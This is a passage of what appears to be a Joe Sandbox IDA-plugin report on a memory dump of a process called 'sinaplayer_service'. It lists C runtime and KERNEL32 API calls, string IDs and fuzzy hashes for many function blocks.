• String ID: ]lm
• API String ID: 2376245552-2416103240
• Opcode ID: 160d327d64e8dbeca74b2d17a431e86a1ba45ae4c8a22db0a3cddcd27176e08e
• Instruction ID: 791d0e8ee6bad14dfcdb5ce1df6b2435af204d28f171746a6e94710cda0203af
• Opcode Fuzzy Hash: 160d327d64e8dbeca74b2d17a431e86a1ba45ae4c8a22db0a3cddcd27176e08e
• Instruction Fuzzy Hash: 00012B79A04219ABFB20DAF6AC44B7F7BECEB452507140152FE04D7145DB21C910C6F1
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: Name::operator+$NameName::
• String ID: throw(
• API String ID: 168861036-3159766648
• Opcode ID: 1540b233fa845c94f2cfe36d76455ef5f533daed5b52c88c6c7fd5570c0eb26e
• Instruction ID: 447e3b5f83dbc3d75e661f4c2f2baacb49b24c6ccf58e6c8ffd89e3fefab856a
• Opcode Fuzzy Hash: 1540b233fa845c94f2cfe36d76455ef5f533daed5b52c88c6c7fd5570c0eb26e
• Instruction Fuzzy Hash: 90018031554309AFEF04CFE8CC51FFE3BB9AB45344F44405AE6099B191DB74AA448B90
APIs
• __wcenvarg.LIBCMT ref: 6D0B2048
  • Part of subcall function 6D0B1E4B: wcslen.MSVCR120(00000000,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?,?), ref: 6D0B1EA4
  • Part of subcall function 6D0B1E4B: _calloc_crt.MSVCR120(00000002,00000002,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?), ref: 6D0B1EBC
  • Part of subcall function 6D0B1E4B: _wdupenv_s.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000), ref: 6D0B1EDB
  • Part of subcall function 6D0B1E4B: wcslen.MSVCR120(?,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?,?), ref: 6D0B1EEF
  • Part of subcall function 6D0B1E4B: wcslen.MSVCR120(?,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?,?), ref: 6D0B1F03
  • Part of subcall function 6D0B1E4B: wcscpy_s.MSVCR120(00000000,?,00000000,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000), ref: 6D0B1F3B
• free.MSVCR120(000000FF,?,00000000,000000FF,?,6D0D4CE2), ref: 6D0B2069
  • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
• free.MSVCR120(?,000000FF,?,00000000,000000FF,?,6D0D4CE2), ref: 6D0B2071
• _errno.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0D4D10
• _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0D4D1B
Strings
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: wcslen$free$FreeHeap__wcenvarg_calloc_crt_errno_invalid_parameter_noinfo_wdupenv_swcscpy_s
• String ID: Lm
• API String ID: 1355187257-3564246650
• Opcode ID: 76bf5bb4073fa13d9f8f257364d9b8be033e431d19ac16dc88059f4c09db1408
• Instruction ID: acbd46e300641175c0b6ee87c7ce3f312cc04aa2ab46f915e0857999803e3b06
• Opcode Fuzzy Hash: 76bf5bb4073fa13d9f8f257364d9b8be033e431d19ac16dc88059f4c09db1408
• Instruction Fuzzy Hash: D7F06D32818119BBEF125FA4DC01BDE3769FF06324F114652FD24961A1D7739A20DBE1
APIs
• _malloc_crt.MSVCR120(?), ref: 6D0AC770
  • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
• std::exception::exception.LIBCMT(?,00000001), ref: 6D0D3AB3
• std::exception::exception.LIBCMT(?), ref: 6D0D3AD4
• _CxxThrowException.MSVCR120(6D0E176C,6D15CE18,?), ref: 6D0D3AE9
• free.MSVCR120(00000000), ref: 6D0D3AF0
Strings
• _DebugMallocator<T>::allocate() - Integer overflow., xrefs: 6D0D3AC9
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: std::exception::exception$ExceptionThrow_malloc_crtfreemalloc
• String ID: _DebugMallocator<T>::allocate() - Integer overflow.
• API String ID: 845836463-3293063709
• Opcode ID: 6a4dfd689e4e56529583a6cfd0ec128a6c4862b63068e50e6c0d11e0993cdfa7
• Instruction ID: 282b801a3d7efb9a5428363ab3d769edcb129dacac0648640ad840ee40bf0749
• Opcode Fuzzy Hash: 6a4dfd689e4e56529583a6cfd0ec128a6c4862b63068e50e6c0d11e0993cdfa7
• Instruction Fuzzy Hash: 94F0F47591830C7AFB00EFA4D885BDE3B6CAB00244B51C166E910EB141DB30C244CA92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _FindAndUnlinkFrame.MSVCR120(?,6D0999B8,00000000), ref: 6D099ABF
                                                                                                                                                                                                      • Part of subcall function 6D099A8D: _getptd.MSVCR120(?,?,6D099AC4,?,6D0999B8,00000000), ref: 6D099A91
                                                                                                                                                                                                      • Part of subcall function 6D099A8D: _getptd.MSVCR120(?,?,6D099AC4,?,6D0999B8,00000000), ref: 6D099AA5
                                                                                                                                                                                                    • _getptd.MSVCR120(6D0999B8,00000000), ref: 6D099AC5
                                                                                                                                                                                                    • _getptd.MSVCR120(6D0999B8,00000000), ref: 6D099AD3
                                                                                                                                                                                                    • _IsExceptionObjectToBeDestroyed.MSVCR120(00000000), ref: 6D099B14
                                                                                                                                                                                                      • Part of subcall function 6D099364: _getptd.MSVCR120 ref: 6D099367
                                                                                                                                                                                                    • __DestructExceptionObject.MSVCR120(?,00000000), ref: 6D099B22
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 473968603-1018135373
                                                                                                                                                                                                    • Opcode ID: c69c183f2a0aeb567c3bf67c87643f11215e2007519679327255a15a990112a2
                                                                                                                                                                                                    • Instruction ID: c6c29cf5bd305bacb5b50d76c7074fdb12208d2b431b77924ae133aa7cf45b4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c69c183f2a0aeb567c3bf67c87643f11215e2007519679327255a15a990112a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B016575C08306CEEB248F20E600B6EB7B2FF54212F25742DD42A1B650DB35D985EA81
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120 ref: 6D0FC9AA
                                                                                                                                                                                                    • __crtFlsGetValue.MSVCR120(00000000), ref: 6D0FC9B0
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120(?), ref: 6D0FC9BF
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?), ref: 6D0FC9C5
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FC9D0
                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 6D0FC9D7
                                                                                                                                                                                                    • _freefls.MSVCR120(?), ref: 6D0FC9F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value__crt__get_tlsindex$ErrorExitLastThread_freefls
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 415173470-0
                                                                                                                                                                                                    • Opcode ID: 8dea7111423c6fd501616c7bb004128d3cf57c720cf87c205ba9aa0b8a6a3005
                                                                                                                                                                                                    • Instruction ID: 4df216c99f384ed19b7e37262c734e8b0213706c83e3b068d3bc8494c9d553c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dea7111423c6fd501616c7bb004128d3cf57c720cf87c205ba9aa0b8a6a3005
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0897450C2069FF7089FB4D54971D7BF9BF052483358459E908CB206DB35D841CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,6D0D3F45,?), ref: 6D0FCA18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0FCA1F
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6D0FCA2B
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000001,6D0D3F45,?), ref: 6D0FCA48
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-340411864
                                                                                                                                                                                                    • Opcode ID: a44f5c743e7e11b3f3d5040aad8ee6113b3db643c6b39291c29f79826dc894d3
                                                                                                                                                                                                    • Instruction ID: 1fd486dd3f1d7b9d155a97034f8150544303bf8c146724fb969b75e299cee2fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44f5c743e7e11b3f3d5040aad8ee6113b3db643c6b39291c29f79826dc894d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6E01274568281ABFF149FB4FE0EB783AB8B74670AF540021F107D9086DFF4D00AAA48
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                    • Opcode ID: 4baa1040828cfe797551a8c501a7ba5fca23831defe1c63595536794fd8fcb59
                                                                                                                                                                                                    • Instruction ID: 66910116821ea8ba1f29059b2a20830cd04b6d65b8e036e0ea63572909a234c3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4baa1040828cfe797551a8c501a7ba5fca23831defe1c63595536794fd8fcb59
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0757451C205CEEB019BB4C9057683AA8BF59319F4644F1D5188B626D7B89A80CA62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,6D0D3F0C), ref: 6D0FCA70
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0FCA77
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6D0FCA82
                                                                                                                                                                                                    • DecodePointer.KERNEL32(6D0D3F0C), ref: 6D0FCA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                            • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _dtest.MSVCR120(?,?,?,?,?,?,?,?,?,6D150120), ref: 6D15016F
                                                                                                                                                                                                    • _dtest.MSVCR120(?,?,?,?,?,?,?,?,?,?,6D150120), ref: 6D15017B
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D1501F7
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D150210
                                                                                                                                                                                                    • __dscale.LIBCMT ref: 6D15026D
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6D150304
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Dunscale_dtest$__dscale__fperrraise
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1009800014-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::CreateAllocatedNodeData.LIBCMT ref: 6D0A78A7
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A461A
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A462D
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A466B
                                                                                                                                                                                                      • Part of subcall function 6D0A45FA: memset.MSVCR120(00000000,00000000,?), ref: 6D0A469C
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 6D0A792E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::DataManager::Resourcememset$AllocatedAllocationCreateGlobalNodeReset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3832299370-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6D0A8CAC
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?), ref: 6D0A8CBB
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101), ref: 6D0A8CD3
                                                                                                                                                                                                    • setSBCS.LIBCMT ref: 6D0D75F0
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101,00000000,00000000,00000000), ref: 6D0D7670
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 344587817-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetTimeFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CC58
                                                                                                                                                                                                    • __crtGetDateFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CC64
                                                                                                                                                                                                    • malloc.MSVCR120(00000000,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CCAB
                                                                                                                                                                                                    • __crtGetTimeFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CCEE
                                                                                                                                                                                                    • __crtGetDateFormatEx.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000,00000000), ref: 6D11CCF5
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D11D992,00000000,00000000), ref: 6D11CD2A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Format__crt$DateTime$_freea_smalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4257112946-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10CF5A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10CF65
                                                                                                                                                                                                    • _stricmp_l.MSVCR120(00000001,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10CF7F
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000002,00000002,?,00000002,?,00000001,00000000,00000000,00000000,00000004,00000000,00000000,00000000), ref: 6D10CFC2
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000000,00000002,?,00000002,?,00000001,?,?,?,?,?,00000000,00000000), ref: 6D10D04D
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 6D10D0B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String__crt_errno$_getptd_invalid_parameter_noinfo_stricmp_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1992914148-0
                                                                                                                                                                                                    • Opcode ID: b6cfae906dbf84914c0c135dea50e33e46292a1bbb46c92c2bff56f3f78f5555
                                                                                                                                                                                                    • Instruction ID: 6e9ff645468c532b8e909cffc12a220b20d93c6c3882b6d7b73e6cf955ddc669
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfae906dbf84914c0c135dea50e33e46292a1bbb46c92c2bff56f3f78f5555
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F518A7090425AABDB02EF94C440FBA77B5EF94314F10C055F9988F1C9CBB6CA42DB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,?), ref: 6D0A0923
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6D0AF7DB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0B138C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D587E
